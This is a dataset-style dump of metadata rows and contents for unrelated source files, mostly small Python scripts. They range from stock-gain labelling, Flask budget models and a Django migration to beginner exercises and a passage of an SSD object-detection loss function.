blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4f00ed6f7a1ecd6d17e60785586ac4cf6bcef125 | d4a86626745280e00985db69c11a5d07f5d648b1 | /amazon2/collect_testing_metadata.py | b9fb7474fbe027a40231e81e3804d76d3eeef8b2 | [] | no_license | galabing/stocks | 48df7692ab3779d558498c9d4d03c301c6759fc9 | 66088e481239c92104221e2c816b5b559d58ebf3 | refs/heads/master | 2021-01-21T02:46:14.109502 | 2013-11-11T22:26:51 | 2013-11-11T22:26:51 | 13,610,364 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,050 | py | #!/usr/bin/python
""" Collects testing metadata:
Given a cutoff date D, lookahead period L, sampling step S, sampling period
number P, collects the following metadata for training:
- for every S days after cutoff date D, up to period P, calculate
and sort gains for all stocks on that date
- classify gains into {+1, -1} classes
- output <date> <ticker> <label> <gain> <perc>
Set P to -1 to collect all available dates after cutoff.
Classification of gains into {+1, -1} is controlled by flags
--max_pos_rank, --min_neg_rank or --min_pos_gain, --max_neg_gain.
One and only one set of flags must be set.
Eg, setting max_pos_rank to 0.25 and min_neg_rank to 0.75 will result in
the top 25% gains being assigned +1, bottom 25% -1 and the 50% in between
dropped.
Eg, setting min_pos_gain to 0.1 and max_neg_gain to -0.1 will result in
stocks with 10+% gains being assigned +1, with 10+% losses being assgined
-1 and the ones in between dropped.
"""
import argparse
import pickle
BONUS = 0.01
MAX_GAIN = 10.0
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--date_file', required=True)
parser.add_argument('--price_map_file', required=True)
parser.add_argument('--cutoff_date', required=True)
parser.add_argument('--lookahead', required=True)
parser.add_argument('--sample_step', required=True)
parser.add_argument('--sample_period', required=True)
parser.add_argument('--max_pos_rank')
parser.add_argument('--min_neg_rank')
parser.add_argument('--min_pos_gain')
parser.add_argument('--max_neg_gain')
parser.add_argument('--output_file', required=True)
args = parser.parse_args()
lookahead = int(args.lookahead)
step = int(args.sample_step)
period = int(args.sample_period)
assert lookahead > 0
assert step > 0
max_pos_rank, min_neg_rank = None, None
if args.max_pos_rank is not None and args.min_neg_rank is not None:
max_pos_rank = float(args.max_pos_rank)
min_neg_rank = float(args.min_neg_rank)
assert max_pos_rank > 0 and max_pos_rank < 1
assert min_neg_rank > 0 and min_neg_rank < 1
assert max_pos_rank <= min_neg_rank
min_pos_gain, max_neg_gain = None, None
if args.min_pos_gain is not None and args.max_neg_gain is not None:
min_pos_gain = float(args.min_pos_gain)
max_neg_gain = float(args.max_neg_gain)
assert min_pos_gain >= max_neg_gain
# Each set of flags must be set together, but the two sets are mutually
# exclusive.
assert (max_pos_rank is None) == (min_neg_rank is None)
assert (min_pos_gain is None) == (max_neg_gain is None)
assert (max_pos_rank is None) != (min_pos_gain is None)
use_rank = max_pos_rank is not None
print 'Loading price map...'
fp = open(args.price_map_file, 'rb')
price_map = pickle.load(fp)
fp.close()
print 'Loaded price map with %d entries' % len(price_map)
min_date = min(price_map.keys())
with open(args.date_file, 'r') as fp:
open_dates = set([d for d in fp.read().splitlines() if d >= min_date])
assert open_dates <= set(price_map.keys())
dates = sorted([d for d in open_dates if d > args.cutoff_date])
max_date = dates[-1]
print '%d open dates between cutoff date %s and max date %s' % (
len(dates), args.cutoff_date, max_date)
if period > 0 and period < len(dates):
dates = dates[:period]
print '%d open dates within sampling period %s ... %s' % (
len(dates), dates[0], dates[-1])
with open(args.output_file, 'w') as fp:
print >> fp, 'cutoff=%s lookahead=%d step=%d period=%d' % (
args.cutoff_date, lookahead, step, period)
for i in range(0, len(dates)-lookahead, step):
print 'Processing sample date: %s' % dates[i]
pm1 = price_map[dates[i]]
pm2 = price_map[dates[i+lookahead]]
gains = []
for k, p1 in pm1.items():
p2 = pm2.get(k)
if p2 is None:
p2 = 0.0
gain = (p2-p1)/(p1+BONUS)
gain = min(MAX_GAIN, gain)
gains.append([k, gain])
gains.sort(key=lambda gain: gain[1], reverse=True)
if use_rank:
max_pos = int(len(gains)*max_pos_rank)
min_neg = int(len(gains)*min_neg_rank)
else:
max_pos, min_neg = 0, len(gains)
for j in range(len(gains)):
if gains[j][1] > min_pos_gain:
max_pos = j+1
if gains[j][1] < max_neg_gain:
min_neg = min(min_neg, j-1)
print ('%d gains calculated, %d pos (max=%.4f%%, min=%.4f%%)'
', %d neg (min=%.4f%%, max=%.4f%%)' % (
len(gains), max_pos, gains[0][1]*100, gains[max_pos-1][1]*100,
len(gains)-min_neg-1, gains[-1][1]*100, gains[min_neg+1][1]*100))
for j in range(max_pos):
print >> fp, '%s %s +1 %.4f%% %.4f%%' % (
dates[i], gains[j][0], gains[j][1]*100, j*100.0/len(gains))
for j in range(min_neg+1, len(gains)):
print >> fp, '%s %s -1 %.4f%% %.4f%%' % (
dates[i], gains[j][0], gains[j][1]*100, j*100.0/len(gains))
if __name__ == '__main__':
main()
| [
"linyang@linyang-macbookpro.roam.corp.google.com"
] | linyang@linyang-macbookpro.roam.corp.google.com |
6604c81541758aaf235d202548008c6429c2a0ba | f6fd4ca884d9e33aa5afdf17b595a251299c8a6f | /06.03.2019/bagdas.py | d2046e20bac2b6f71cc24c85fd07fdc880abd082 | [] | no_license | unsalfurkanali/pythonCourse | 61c1f85e4bbf1f6543c9c30048287609cb4c8237 | 7e14b8b51e2056c9ce58bfe117b25317066ca3ff | refs/heads/master | 2020-04-25T23:57:34.182331 | 2019-03-07T10:50:31 | 2019-03-07T10:50:31 | 173,162,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 358 | py | def d(n):
tbt = 0
for i in range(1, n, 1):
if n % i == 0:
tbt = tbt + i
return tbt
sayac = 0
for a in range(1, 1000, 1):
for b in range(1, 1000, 1):
if a != b:
if d(a) == b and d(b) == a:
sayac = sayac + 1
print("{} ve {} bağdaş sayıdır".format(a, b))
print(sayac) | [
"unsalfurkanali@users.noreply.github.com"
] | unsalfurkanali@users.noreply.github.com |
42de88eb553c0e4e996822b8763fa6c13507faa7 | e5eeb6d9e7c2d7a53f864f8b9df7ca0cb79932ef | /sa/profiles/Alstec/MSPU/__init__.py | b7d0c1ced7d78897c77243798ea9274c7900e37e | [
"BSD-3-Clause"
] | permissive | 0pt1on/noc | aa583a6684f8299467c665e303f7ffa47ad6b88a | 4eb26dd44002a0a4a562973815567237d979cab5 | refs/heads/master | 2020-06-20T08:51:11.653330 | 2019-07-12T07:13:45 | 2019-07-12T07:13:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 599 | py | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Vendor: Alstec
# OS: MSPU
# ---------------------------------------------------------------------
# Copyright (C) 2007-2017 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# NOC modules
from noc.core.profile.base import BaseProfile
class Profile(BaseProfile):
name = "Alstec.MSPU"
pattern_prompt = r"^\S+\$> "
pattern_more = r"^--More-- or \(q\)uit$"
pattern_syntax_error = r"\^ error"
command_exit = "exit"
| [
"dmitryluhtionov@gmail.com"
] | dmitryluhtionov@gmail.com |
7a8b4e9165e31e186c5a6a10fd51e8e11d3c00d2 | bf13619dc6bdb211f224ae8e00b8005244bfe553 | /number8.py | 4cabcce24a4af79301e6c1c6823b94213c5384c6 | [] | no_license | dhSbid/apcsLabs | 749b72680d7013dfcbdf1525e2fc9c20d27b1680 | 46d1f11c33e46226f54fb5b94a35c143a8f13fc4 | refs/heads/main | 2023-02-11T09:35:08.332667 | 2021-01-10T04:42:59 | 2021-01-10T04:42:59 | 321,218,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py | def capFirstWord(sentence):
sList = sentence.split(". ")
for i in sList:
sList[i][0] = sList[i][0].toUpper()
newString = sList.join();
return newString
capFirstWord("hello. i am. bye. now for real.")
| [
"dh.sbid@students.srvusd.net"
] | dh.sbid@students.srvusd.net |
51068db68050eb59fde0721edcb025d1ceab1e15 | 66e298540c4c254912b5543baaa5a20830177f06 | /models.py | 0f6ea486d9d8832396df65a3b920808a457acc5c | [] | no_license | emm190/Monthly-Budgeter | a33acfd19b07d24295ea6abdd0ab05861ead4381 | b3db686437bf505e728fe4e139cf3d3dc0e2fd9d | refs/heads/main | 2023-02-03T07:49:12.338849 | 2020-12-20T06:12:16 | 2020-12-20T06:12:16 | 323,005,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,784 | py | #models
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
db = SQLAlchemy()
from sqlalchemy_serializer import SerializerMixin
#users, categories, purchases
#one user can make many purchases
#one purchase can only be purchased by one user
#let's just focus on user and purchase which is a one to many relationship
#user
class User(db.Model, SerializerMixin):
user_id = db.Column(db.Integer, primary_key=True) #standard primary key
username = db.Column(db.String(60), nullable=False, unique=True) #unique username - cannot be blank
password = db.Column(db.String(64), nullable=False) #password - hashed before saving to db & cannot be blank
purchases = db.relationship('Purchase', backref='user')
def __init__(self, username, password):
self.username = username
self.password = password
def __repr__(self):
return '<User {}>'.format(self.username)
PurchaseCategory = db.Table('purchase_categories',
db.Column('id', db.Integer, primary_key=True),
db.Column('purchase_id', db.Integer, db.ForeignKey('purchases.purchase_id')),
db.Column('category_id', db.Integer, db.ForeignKey('categories.category_id')))
class Purchase(db.Model, SerializerMixin):
__tablename__ = 'purchases'
purchase_id = db.Column(db.Integer, primary_key=True)
amount_spent = db.Column(db.Float, nullable=False)
name_of_purchase = db.Column(db.String(400), nullable=True)
date_spent = db.Column(db.DateTime, nullable=False)
category_name = db.Column(db.String(400), nullable=False)
category = db.relationship("Category", secondary=PurchaseCategory, backref=db.backref('purchases'))
user_id = db.Column(db.Integer, db.ForeignKey('user.user_id'))
users = db.relationship(User)
def __init__(self, amount_spent, name_of_purchase, date_spent, category_name, user_id):
self.amount_spent = amount_spent
self.name_of_purchase = name_of_purchase
self.date_spent = date_spent
self.category_name = category_name
self.user_id = user_id
def __repr__(self):
return '<Purchase {}>'.format(self.name_of_purchase)
class Category(db.Model, SerializerMixin):
__tablename__ = 'categories'
category_id = db.Column(db.Integer, primary_key=True)
category_limit = db.Column(db.Float, nullable=False)
category_name = db.Column(db.String(400), nullable=True)
category_creator = db.Column(db.String(400), nullable=False)
def __init__(self, category_limit, category_name, category_creator):
self.category_limit = category_limit
self.category_name = category_name
self.category_creator = category_creator
def __repr__(self):
return '<Category {}>'.format(self.category_name)
| [
"noreply@github.com"
] | noreply@github.com |
7d4ad877ef0674f0248f5b402f5ca2ec0fbca0b5 | 83932f1d956a6b7818c6e58a31205e6e26f2fb5c | /0x11-python-network_1/2-post_email.py | ae506265afc23c32cdffd2a0428200f828ddb688 | [] | no_license | Nzparra/holbertonschool-higher_level_programming | a17834b8239e477a7284119acac69da0e7d7261e | 6cf7a44a10db7a10be3c3c02cbacfea9a7b897f2 | refs/heads/master | 2020-09-29T02:45:04.458850 | 2020-05-14T21:12:45 | 2020-05-14T21:12:45 | 226,930,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 408 | py | #!/usr/bin/python3
""" sends a POST request to the passed URL with the email as a parameter """
from urllib import request, parse
import sys
if __name__ == "__main__":
req = parse.urlencode({'email': sys.argv[2]})
req = req.encode('ascii')
reqst = request.Request(sys.argv[1], req)
with request.urlopen(reqst) as response:
html = response.read()
print(html.decode('utf-8'))
| [
"nzparra@gmail.com"
] | nzparra@gmail.com |
99b9f127259fa1b88da83c73c1b13ae51336a33c | 20a3cc1106fa86fc2d45cd1728cc87d5db97e1f7 | /old/s3c/explosion.py | d214948ae8a509ca9fcf7d2f5cbf3d133373c71a | [] | no_license | sarahboufelja54/galatea | f5664f0b3117629b2c5bbe078a1bd52bb5e359e6 | 002a9f2905868be25b71770190fb2d5eda11c861 | refs/heads/master | 2020-12-04T13:45:07.697189 | 2018-12-12T16:27:09 | 2018-12-12T16:27:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 790 | py | #attempting to create an excitation-based explosion (I don't think it's possible)
hat_h = [1., 1.]
alpha = [.01 , .01]
W = [ -1., 1. ]
beta = 1
w = [ beta * (weight ** 2) for weight in W ]
init_hat_s = [ 1., 1.5 ]
hat_s = [ val for val in init_hat_s ]
#like mu in our current model, except that it isn't gated by h
always_on_mu = [ 0., 0. ]
v = 1
def update():
rval = []
for i in xrange(2):
scaleback = alpha[i] + w[i]
mean_term = always_on_mu[i]
data_term = beta * v * W[i]
j = 1 - i
interaction_term = - W[i] * W[j] * beta * hat_h[j] * hat_s[j]
hat_s_i = (mean_term + data_term + interaction_term) / scaleback
rval.append(hat_s_i)
return rval
for iter in xrange(100):
print hat_s
hat_s = update()
| [
"goodfellow.ian@gmail.com"
] | goodfellow.ian@gmail.com |
cb7ad2618252a0667c0504b76cec1808499cb7db | f4ad60639b949cfb82d283b5e8900db38ab94dff | /oop/modules/parent.py | 83ab1f67fd032eb4c4ddd21b0cc8dd8988660c68 | [] | no_license | HavrylenkoM/homework | 16818e8e4f96c569976050cc3d507788db6a4855 | a703705634957fc3fa3fb76b5b8380600207e5ec | refs/heads/master | 2020-12-01T08:54:45.631490 | 2020-01-04T00:02:50 | 2020-01-04T00:02:50 | 230,596,290 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 754 | py | class Employee:
def __init__(self, name, mail, phone, zp, time):
self.name = name
self.mail = mail
self.phone = phone
self.salary = zp
self.time = time
#def checksalary(self, days):
# if days == None:
# return self.salary * day_count
# return self.salary * days
def work(self):
return 'I come to office.'
def __lt__(self, other):
return self.salary < other.salary
def __gt__(self, other):
return self.salary > other.salary
def __eq__(self, other):
return self.salary == other.salary
def __le__(self, other):
return self.salary <= other.salary
def __ge__(self, other):
return self.salary >= other.salary
| [
"mikegavrylenko@gmail.com"
] | mikegavrylenko@gmail.com |
e92404791804816246e695a517050fec3eab7da0 | 2c4cb21f9e9c7d885ed6e90c66b58e94420fc909 | /Programas em Phyton/Conversor de Temperatura.py | 6dc9d22e3e4f9b31614efd01d2bc4dd52a51d57c | [] | no_license | Thiago2123/Facul | 8cba318a3256f159c3d29ae7f8005431d481444b | 0987cd9d8f7d3dbe27da89c61a603d4a8310f97b | refs/heads/master | 2020-05-26T13:43:19.729026 | 2019-06-01T15:35:26 | 2019-06-01T15:35:26 | 188,251,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 173 | py |
temperaturaF = input("Digite uma temp em Fahrennheit ")
temperaturaC = ( float (temperaturaF)-32) * 5/9
print ("A temperatura em Celcius é", temperaturaC)
| [
"noreply@github.com"
] | noreply@github.com |
84ca08030eb010731c4720ff1fa52102c910d07d | 81b50896e6b47a508f070f57c535eb3c9deb2259 | /main.py | 36897e1d350f872c3696df55e39f3f1e7e509983 | [] | no_license | BrandtDavis/alberta_covid_data_pipeline | c1aff90b478906794eaf84b3a213d08a0b002550 | c7c1909a52b8aeba96de107fb440d1add7951d58 | refs/heads/main | 2023-08-25T10:53:57.177290 | 2021-10-10T18:49:09 | 2021-10-10T18:49:09 | 408,219,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 893 | py | # Author: Brandt Davis
# This file controls the program flow and functionality
from log_writer import Log_writer
import extract_data
import transform_data
import load_data
import log_writer
import visualize_data
def main():
# INITIALIZE OBJECTS
extract = extract_data.Extract_data()
transform = transform_data.Transform_data()
load = load_data.Load_data()
logger = log_writer.Log_writer()
visualize = visualize_data.Visualize_data()
# PIPELINE OPERATION
# ==================
# Retrieve files if they are outdated, log the extraction
file_list = extract.retrieve_ab_csv_files()
logger.log_data_extraction(file_list)
ab_covid_data = extract.get_alberta_covid_stats_dataframe()
ab_covid_deaths = transform.get_deaths_by_age(ab_covid_data)
visualize.create_bar_graph_of_data(ab_covid_deaths)
if __name__ == '__main__':
main() | [
"brandtd77@gmail.com"
] | brandtd77@gmail.com |
0bc0c6205078a53032cd587a1593d86b5eefc5bb | 570337818eaafd71370368dc28b5244784e9879d | /Assignment 3/ass3-8.py | 3b2d69ebd547cf36ae0f92a4df69968e9084fa88 | [] | no_license | rajatgarg2/rajatcode | be89f3ae4d74adebb45caf538594539b97553249 | e3c8077fc9e7da18f4fb9d7428a7c9ca72aca6ee | refs/heads/master | 2023-01-03T14:17:50.627678 | 2020-10-25T13:48:14 | 2020-10-25T13:48:14 | 284,300,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 494 | py | def spy_gamer(l):
c=0
len=l.__len__()
for i in range(len):
if l[i]==0:
c=1
break
if c==1:
for j in range(i+1,len):
if l[j]==0:
c=2
break
if c==2:
for k in range(j+1,len):
if l[k]==7:
return True
else:
return False
else:
return False
l=[1,2,3,0,0,7,5,4]
print(spy_gamer(l)) | [
"noreply@github.com"
] | noreply@github.com |
93b54ee7f652750ce07be3a5f26230012a9084b7 | 9f8c7677200974dd1456e62e855c438d2004f68d | /server/utils/exceptions.py | a44df0f5ae59c79af52ef1f8a8969e683bdb9c8e | [] | no_license | silentinfotech/LittleSense | 5f126ba92d6812b0ddce56073322b6dc8ea19b13 | 0f85bb629272cea09c04a3faef532ecb7f87a96e | refs/heads/master | 2020-07-22T18:50:59.662832 | 2019-05-03T10:44:19 | 2019-05-03T10:44:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 719 | py |
class UnknownDevice(KeyError):
"""Raised when an unknown device id is used"""
class IllformedField(SyntaxError):
"""Thrown when a field is not correctly formed"""
class UnknownFieldName(LookupError):
"""Thrown when a field name is not know to be assosiated with a device"""
class InvalidFieldDataType(LookupError):
"""Thrown when a field name contains an unkown data type"""
class InvalidUTCTimestamp(ValueError):
"""Thrown when the passed UTC string cannot be parsed"""
class InvalidPacket(ValueError):
"""Thrown when the packet formatter cannot parse the incomming data"""
class InvalidReadingsRequest(ValueError):
"""Thrown when a request for readings has an invalid format"""
| [
"jacob@kittley.com"
] | jacob@kittley.com |
328266f06449ae540af5cc69bd820c5638df5007 | ab5b7c9b223860a5de21be7f50b38e328b8a4d1a | /Bookstore/migrations/0008_comment_date.py | 9b896966308f15124113cd8d028f85b734e1d964 | [
"Apache-2.0"
] | permissive | nuaaflash/NuaaOldBookStore | 9ebd9bc61324aa9fb82485671640a72603c1158c | 259f551a5fa97f2862745cb239c50d8ef87efe49 | refs/heads/master | 2020-04-07T10:55:46.334464 | 2018-11-21T00:23:07 | 2018-11-21T00:23:07 | 158,305,801 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 551 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('Bookstore', '0007_auto_20150108_1426'),
]
operations = [
migrations.AddField(
model_name='comment',
name='date',
field=models.DateTimeField(default=datetime.datetime(2015, 1, 8, 14, 47, 23, 992507, tzinfo=utc)),
preserve_default=False,
),
]
| [
"xh.yes@qq.com"
] | xh.yes@qq.com |
11e83bb3e66cac2f49bcbdc9f7ea9d2f86ba5af2 | def0712cb377ceee6f5fecf872846745130f3b61 | /main/migrations/0002_storagelogtype_name.py | 956fed1331f100166f7908a1e09aecf8f5115805 | [] | no_license | thewebcat/crm | 04fbd18083f41782552dea7836b8af395f8a4750 | f7424a266eabaa29a2c1ea25a5d24f13e4dfd44c | refs/heads/master | 2020-06-25T19:22:05.910165 | 2017-07-18T06:45:39 | 2017-07-18T06:45:39 | 96,983,205 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-12-26 15:21
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='storagelogtype',
name='name',
field=models.CharField(default=1, max_length=255),
preserve_default=False,
),
]
| [
"admin@web-server.fxbox.org"
] | admin@web-server.fxbox.org |
a8fa9c19001403543360c111212013e80ce6d390 | 45799ccc3a16c785ab3c65f3296d66f8463590dc | /docs/_downloads/7dfb273e58ce9eea02e428696e9a9672/q108.py | de3417bd434085db9999cb7596c5a4dfcfe82b2f | [
"MIT"
] | permissive | odys-z/hello | 9d29b7af68ea8c490b43994cf16d75c0e8ace08e | fedd0aec7273f3170aa77316d0d5f317cc18a979 | refs/heads/master | 2023-08-19T03:25:58.684050 | 2023-08-18T08:07:27 | 2023-08-18T08:07:27 | 154,006,292 | 0 | 0 | MIT | 2023-04-18T22:50:56 | 2018-10-21T12:34:12 | C++ | UTF-8 | Python | false | false | 1,496 | py | '''
108. Convert Sorted Array to Binary Search Tree
https://leetcode.com/problems/convert-sorted-array-to-binary-search-tree/
Given an integer array nums where the elements are sorted in ascending
order, convert it to a height-balanced binary search tree.
A height-balanced binary tree is a binary tree in which the depth of
the two subtrees of every node never differs by more than one.
Created on 17 Apr 2021
@author: Odys Zhou
'''
from unittest import TestCase
from typing import List
from utils.treehelper2 import TreeNode, list2tree
# Definition for a binary tree node.
class Solution:
'''
64.58%
'''
def sortedArrayToBST(self, nums: List[int]) -> TreeNode:
'''
nums: sorted
'''
l, r = 0, len(nums) - 1
def buildTree(lix, rix) -> 'root':
'''
0, 0 0, 1 0, 2 0, 3 0, 4
0 0 1 1 2
'''
if lix > rix: return None
m = (lix + rix) // 2
root = TreeNode(nums[m])
root.left = buildTree(lix, m-1)
root.right = buildTree(m+1, rix)
return root
return buildTree(l, r)
if __name__ == "__main__":
t = TestCase()
s = Solution()
res =s.sortedArrayToBST([-10, -3, 0, 5, 9]).print()
t.assertTrue( list2tree([0, -3, 9, -10, None, 5]).print() == res or
list2tree([0, -10, 5, None, -3, None, 9]).print() == res)
print('q108 OK!')
| [
"odysseusj@163.com"
] | odysseusj@163.com |
72228121b096510616532a4edb9408df229e04ab | 5b9485c4ad9db15ff3e535085092fb45057f7364 | /src/nuxeo/javascript/cpsskins/tests/functional/treeview/browser.py | 6162bef9cd7e0d77dbb40da6b1080e30ac097356 | [
"ZPL-2.1"
] | permissive | nuxeo-cps/zope3--nuxeo.javascript | 06109541949c1e612b232efeddec3aa04ecb7d84 | 3ac03c8c46daf75ae7b3ff2fba308cba8caff245 | refs/heads/main | 2023-01-24T06:54:13.659442 | 2009-12-22T09:24:26 | 2009-12-22T09:24:26 | 317,995,433 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,947 | py |
from urllib import unquote
from zope.app.publisher.browser import BrowserView
from cpsskins import minjson as json
tree_data = {
'items': [
{'id': '1', 'title': 'item 1', 'depth': 1, 'type': 'inner'},
{'id': '2', 'title': 'item 2', 'depth': 2, 'type': 'inner',
'empty': True},
{'id': '3', 'title': 'item 3', 'depth': 2, 'type': 'leaf'},
{'id': '4', 'title': 'item 4', 'depth': 2, 'type': 'inner'},
{'id': '5', 'title': 'item 5', 'depth': 3, 'type': 'leaf',
'position': 'last'},
{'id': '6', 'title': 'item 6', 'depth': 1, 'type': 'inner'},
{'id': '7', 'title': 'item 7', 'depth': 2, 'type': 'inner',
'empty': True},
{'id': '8', 'title': 'item 8', 'depth': 2, 'type': 'leaf',
'position': 'last'},
]
}
MAX_DEPTH = 10
class Views(BrowserView):
def getTreeData(self):
local_data = self._getLocalStorageData(1)
if local_data is None:
local_data = {}
tree_state = local_data.get('state', {})
filtered_items = []
filter_depth = MAX_DEPTH
for item in tree_data['items']:
depth = item['depth']
if depth > filter_depth:
continue
else:
filter_depth = MAX_DEPTH
if item['type'] == 'inner':
state = tree_state.get(item['id'])
if state != 'open':
filter_depth = depth
filtered_items.append(item)
self.request.response.setHeader('content-type', 'text/x-json')
return json.write({'items': filtered_items})
def setTreeData(self, data):
return self.getTreeData()
# TODO: moves this to an API
def _getLocalStorageData(self, id):
value = self.request.cookies.get('cpsskins_local_storage_%s' % id)
if value is not None:
return json.read(unquote(value))
return None
| [
"devnull@localhost"
] | devnull@localhost |
82e13c05761482ab49cd9c49c629ff150fe4a498 | b5025befdf74fff3071252abaa4db09479f2d763 | /Shanu_Abraham/10_aug_assignment_12/greater_no.py | 63f96575f11fe41f86239e36c7219bdfebe035b2 | [] | no_license | sidv/Assignments | d2fcc643a2963627afd748ff4d690907f01f71d8 | d50d668264e2a31581ce3c0544f9b13de18da2b3 | refs/heads/main | 2023-07-30T02:17:19.392164 | 2021-09-23T04:47:56 | 2021-09-23T04:47:56 | 392,696,356 | 1 | 20 | null | 2021-09-23T08:14:11 | 2021-08-04T13:20:43 | Python | UTF-8 | Python | false | false | 489 | py | # Program to find greatest no out of four nos
num1 = int(input("enter the 1st no"))
num2 = int(input("enter the 2nd no"))
num3 = int(input("enter the 3rd no"))
num4 = int(input("enter the 4th no"))
if ((num1>num2) and (num1>num3) and (num1>num4)):
print("The greater no is",num1)
elif((num2>num1) and (num2>num3) and (num2>num4)):
print("The greater no is",num2)
elif((num3>num1) and (num3>num2) and (num3>num4)):
print("The greater no is",num3)
else:
print("The greater no is",num4)
| [
"shanususan@gmail.com"
] | shanususan@gmail.com |
5360f0f0d9b911bb3033292064920cc4edcb718e | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Flask/Book_evaluator/venv/Lib/site-packages/urllib3/util/__init__.py | 130a48f4f4e13e706d68fa3f49aa7081eb6997c7 | [] | no_license | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:e916a7e28015232e340aefe810f5a7355f5bc05e6b5f1e86d43519ee87a18cf6
size 1044
| [
"nateweiler84@gmail.com"
] | nateweiler84@gmail.com |
bc9f78070db898ead3722ca20a6f26dedfe71f55 | 2c12dbd152d3483f54bf8cb619d9dfc070c90612 | /nets/ssd_training.py | 380e5b09989b43ecc318fa58cf1757cbbad02624 | [] | no_license | simon108018/MobileNetV2-SSD | 3647ad0dba236e8f08aac3adbdc974959647f240 | 5d1ceec17db92647de771439c0deed3d88f36aef | refs/heads/main | 2023-02-01T03:24:25.897596 | 2020-12-18T07:44:55 | 2020-12-18T07:44:55 | 322,504,883 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,311 | py | import tensorflow as tf
from random import shuffle
import numpy as np
import cv2
from PIL import Image
from tensorflow.keras.applications.imagenet_utils import preprocess_input
from tensorflow.keras import backend as K
from matplotlib.colors import rgb_to_hsv, hsv_to_rgb
class MultiboxLoss(object):
def __init__(self, num_classes, alpha=1.0, neg_pos_ratio=3.0,
background_label_id=0, negatives_for_hard=100.0):
self.num_classes = num_classes
self.alpha = alpha
self.neg_pos_ratio = neg_pos_ratio
if background_label_id != 0:
raise Exception('Only 0 as background label id is supported')
self.background_label_id = background_label_id
self.negatives_for_hard = negatives_for_hard
def _l1_smooth_loss(self, y_true, y_pred):
abs_loss = tf.abs(y_true - y_pred)
sq_loss = 0.5 * (y_true - y_pred) ** 2
l1_loss = tf.where(tf.less(abs_loss, 1.0), sq_loss, abs_loss - 0.5)
return tf.reduce_sum(l1_loss, -1)
def _softmax_loss(self, y_true, y_pred):
y_pred = tf.maximum(y_pred, 1e-7)
softmax_loss = -tf.reduce_sum(y_true * tf.math.log(y_pred),
axis=-1)
return softmax_loss
def compute_loss(self, y_true, y_pred):
batch_size = tf.shape(y_true)[0]
num_boxes = tf.cast(tf.shape(y_true)[1], tf.float32)
# 计算所有的loss
# 分类的loss
# batch_size,8732,21 -> batch_size,8732
conf_loss = self._softmax_loss(y_true[:, :, 4:-8],
y_pred[:, :, 4:-8])
# 框的位置的loss
# batch_size,8732,4 -> batch_size,8732
loc_loss = self._l1_smooth_loss(y_true[:, :, :4],
y_pred[:, :, :4])
# 获取所有的正标签的loss
# 每一张图的pos的个数
num_pos = tf.reduce_sum(y_true[:, :, -8], axis=-1)
# 每一张图的pos_loc_loss
pos_loc_loss = tf.reduce_sum(loc_loss * y_true[:, :, -8],
axis=1)
# 每一张图的pos_conf_loss
pos_conf_loss = tf.reduce_sum(conf_loss * y_true[:, :, -8],
axis=1)
# 获取一定的负样本
num_neg = tf.minimum(self.neg_pos_ratio * num_pos,
num_boxes - num_pos)
# 找到了哪些值是大于0的
pos_num_neg_mask = tf.greater(num_neg, 0)
# 获得一个1.0
has_min = tf.cast(tf.reduce_any(pos_num_neg_mask), tf.float32)
num_neg = tf.concat(axis=0, values=[num_neg,
[(1 - has_min) * self.negatives_for_hard]])
# 求平均每个图片要取多少个负样本
num_neg_batch = tf.reduce_mean(tf.boolean_mask(num_neg,
tf.greater(num_neg, 0)))
num_neg_batch = tf.cast(num_neg_batch, tf.int32)
# conf的起始
confs_start = 4 + self.background_label_id + 1
# conf的结束
confs_end = confs_start + self.num_classes - 1
# 找到实际上在该位置不应该有预测结果的框,求他们最大的置信度。
